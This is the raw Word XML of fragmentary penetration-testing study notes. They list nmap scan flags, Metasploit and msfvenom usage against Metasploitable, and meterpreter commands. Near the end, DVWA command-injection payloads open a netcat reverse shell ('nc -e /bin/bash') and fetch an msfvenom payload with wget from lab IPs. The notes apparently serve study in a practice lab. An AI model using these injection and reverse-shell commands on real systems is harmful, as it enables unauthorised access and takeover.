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11F96FC9" w14:textId="77777777" w:rsidR="00620B00" w:rsidRDefault="00620B00"/>
          <w:p w14:paraId="68C514E5" w14:textId="77777777" w:rsidR="004E281E" w:rsidRPr="004E281E" w:rsidRDefault="004E281E" w:rsidP="004E281E"/>
          <w:p w14:paraId="2C2FBF44" w14:textId="77777777" w:rsidR="004E281E" w:rsidRDefault="004E281E" w:rsidP="004E281E"/>
          <w:p w14:paraId="4F514C9E" w14:textId="77777777" w:rsidR="004E281E" w:rsidRDefault="004E281E" w:rsidP="004E281E"/>
          <w:p w14:paraId="6DA6416A" w14:textId="7CF52961" w:rsidR="004E281E" w:rsidRPr="004E281E" w:rsidRDefault="004E281E" w:rsidP="004E281E">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="3350"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
          </w:p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proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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proofErr w:type="spellStart"/>
            <w:r>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidR="00F62B37">
              <w:t>kdir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">Virtual Machine </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msfadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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E5CC5">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t>Nglookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005E5CC5">
              <w:rPr>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t xml:space="preserve">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proofErr w:type="spellEnd"/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Whatweb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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proofErr w:type="spellEnd"/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>hatweb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00C65A4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whatweb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">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proofErr w:type="spellStart"/>
            <w:r w:rsidR="001F6979">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>theHarvester</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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theHarvester</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">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1A0942BF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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005A37FA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005A37FA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005A37FA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>netdiscover</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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09568C" w14:paraId="455B18B6" w14:textId="77777777" w:rsidTr="007F2764">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="386CEA08" w14:textId="325B94D2" w:rsidR="0009568C" w:rsidRPr="0009568C" w:rsidRDefault="0009568C" w:rsidP="00690490">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>sC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>sV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>oN</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>folderName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>} {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>TargetIPAddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0009568C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>}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sS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 xml:space="preserve">man </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000E0987">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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r w:rsidR="006A5E02">
              <w:t>O</w:t>
            </w:r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Sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00831BD4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w: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-A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–version-intensity 9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-f {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ipaddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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lastRenderedPageBreak/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975B42">
              <w:t xml:space="preserve">RND:5 </w:t>
            </w:r>
            <w:r>
              <w:t>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727392">
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00727392">
              <w:t>sS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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E81E27">
              <w:t>{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00E81E27">
              <w:t>ipaddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00E81E27">
              <w:t>}, D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-S 8.8.8.8 -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Pn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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4D266C">
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="004D266C">
              <w:t xml:space="preserve"> –script auth 192.168.1.75 -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="004D266C">
              <w:t>sS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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</w:t>
            </w:r>
            <w:r w:rsidR="00BF0B6E">
              <w:t>malware</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">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banner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exploit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</w:t>
            </w:r>
            <w:r w:rsidR="002B181C">
              <w:t xml:space="preserve"> ftp-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002B181C">
              <w:t>anon.nse</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002B181C">
              <w:t xml:space="preserve">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 xml:space="preserve">Manual Vulnerability Analysis and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DB0903">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>searchploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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 xml:space="preserve">Google it if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>theres</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00893346">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Metaploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00893346">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D11E8D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D11E8D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA0ECE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00DC192F">
              <w:t>smb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00DC192F">
              <w:t>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lastRenderedPageBreak/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proofErr w:type="spellStart"/>
            <w:r w:rsidR="00956DEC">
              <w:t>paypload</w:t>
            </w:r>
            <w:r w:rsidR="00B10F4D">
              <w:t>s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">CL: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818845" w14:textId="77777777" w:rsidR="0059475F" w:rsidRDefault="00AF1B41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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>unix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/-&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38EFFB4F" w14:textId="0F4279B8" w:rsidR="00C05080" w:rsidRDefault="00C05080" w:rsidP="00C05080">
            <w:r>
              <w:t xml:space="preserve">CL: show </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>payploads</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005E4457">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005E4457">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">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 xml:space="preserve">CL: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D7799A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Searchsploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D7799A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D7799A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>tetnetd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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search Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D7799A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>telnetd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D7799A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ipaddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D7799A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4442DECD" w14:textId="1843B767" w:rsidR="00C72950" w:rsidRDefault="00C72950" w:rsidP="00C72950">
            <w:r>
              <w:t xml:space="preserve">CL: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>searchs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> samba</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78DF98B8" w14:textId="25FE463C" w:rsidR="00A14902" w:rsidRDefault="00A14902" w:rsidP="00C72950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  <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>smb_version</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="440ADE75" w14:textId="098027C7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ssh_login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>filepath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>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 xml:space="preserve">CL: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msfadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>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 xml:space="preserve">CL: search </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>eternalblue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>DoublePulsar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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58EF5CC2" w14:textId="119D40CD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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00141370">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>BlueKeep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00141370">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00141370">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Routersploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">Follow the instructions in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>github</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">cd </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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routersploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>autopwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">Note: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE36AC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CL:msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> –list venom</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="027C5AC5" w14:textId="312719D9" w:rsidR="003F3FA1" w:rsidRDefault="00A15148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 xml:space="preserve">Veil – generating </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B86354">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>powershell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B86354">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">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 xml:space="preserve">Note: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fatrat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">CL </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">CL: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4DD4FA56" w14:textId="7F52B145" w:rsidR="004428AE" w:rsidRDefault="004428AE" w:rsidP="0075504F">
            <w:r>
              <w:t xml:space="preserve">CL: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">Some of the command in, when </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>your</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in windows 10 machine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4593CCD5" w14:textId="77777777" w:rsidR="00E85572" w:rsidRDefault="00E85572" w:rsidP="00E85572">
            <w:r>
              <w:t>&gt;download {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fileName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F14FAA">
              <w:t>fileName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F14FAA">
              <w:t>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 xml:space="preserve">&gt;search </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bypassuac</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dirb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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in the website</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E0CB634" w14:textId="2032AA41" w:rsidR="007C7509" w:rsidRDefault="007C7509" w:rsidP="009E14E3">
            <w:r>
              <w:t>&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dirb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dvwa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> website 192.168.1.1;ls-la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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lvp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">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 xml:space="preserve">192.168.1.1; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -e /bin/bash 192.168.1.85 12345</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="392F80AA" w14:textId="3CD68C28" w:rsidR="00C06CD2" w:rsidRDefault="00C06CD2" w:rsidP="009E14E3">
            <w:r>
              <w:t>192.168.1.1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0FEBFBB8" w14:textId="02364006" w:rsidR="009E14E3" w:rsidRDefault="0034438C" w:rsidP="009E14E3">
            <w:r>
              <w:t>Getting Meterpreter shell with command execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7642C51F" w14:textId="378733E3" w:rsidR="00CE063A" w:rsidRDefault="00CE063A" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p python/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  <w:r>
              <w:t xml:space="preserve"> LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="322F9DBC" w14:textId="77777777" w:rsidR="007B6D84" w:rsidRDefault="007B6D84" w:rsidP="009E14E3"/>
          <w:p w14:paraId="4D0DB457" w14:textId="0FDD7AFD" w:rsidR="00657D14" w:rsidRDefault="0086675F" w:rsidP="009E14E3">
            <w:r w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidR="00657D14" w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>udo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00657D14" w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> service apache2 start</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC3F036" w14:textId="7857563C" w:rsidR="00E32A5C" w:rsidRPr="00E32A5C" w:rsidRDefault="00E32A5C" w:rsidP="009E14E3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="111111"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="111111"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 service apache2 restart</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49943D7F" w14:textId="4B8EEEA0" w:rsidR="00E32A5C" w:rsidRDefault="00E32A5C" w:rsidP="009E14E3">
            <w:r w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="111111"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E32A5C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="111111"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 service apache2 stop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B22D55" w14:textId="77777777" w:rsidR="00DD06AD" w:rsidRDefault="00DD06AD" w:rsidP="009E14E3"/>
          <w:p w14:paraId="7474D2EE" w14:textId="77777777" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="10743F49" w14:textId="77777777" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="35590413" w14:textId="77777777" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="2EDD0CE3" w14:textId="5FB9BB4B" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidR="001A3E77">
              <w:t>192.168.1.1</w:t>
            </w:r>
            <w:r>
              <w:t>;ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="387C79AC" w14:textId="4B676F29" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3">
            <w:r>
              <w:t>OR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A2065E3" w14:textId="6189E5A9" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;;ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61E22F7B" w14:textId="1F40E1DC" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="1725724A" w14:textId="4D4B6604" w:rsidR="00A462B6" w:rsidRDefault="00A462B6" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 192.168.1.85/tester.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="609578F9" w14:textId="51C812C5" w:rsidR="00442C5B" w:rsidRDefault="00442C5B" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 192.168.1.9/tester.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0384F6F9" w14:textId="4A77FA64" w:rsidR="00740A03" w:rsidRDefault="00740A03" w:rsidP="009E14E3">
            <w:r>
              <w:t>&gt;;ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EAF6C87" w14:textId="0AE3505C" w:rsidR="00A462B6" w:rsidRDefault="00A462B6" w:rsidP="009E14E3"/>
          <w:p w14:paraId="4D8EA0AE" w14:textId="77777777" w:rsidR="00A462B6" w:rsidRDefault="00A462B6" w:rsidP="009E14E3"/>
          <w:p w14:paraId="03CB2618" w14:textId="77777777" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="2CA2AD25" w14:textId="77777777" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
          <w:p w14:paraId="1D657ECA" w14:textId="2381262F" w:rsidR="00E41DE5" w:rsidRDefault="00E41DE5" w:rsidP="009E14E3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E14E3" w14:paraId="42DE3672" w14:textId="77777777" w:rsidTr="00864A74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77EE7408" w14:textId="5640E0EA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lastRenderedPageBreak/>
              <w:t>Reflected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FF752E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">– </w:t>
            </w:r>
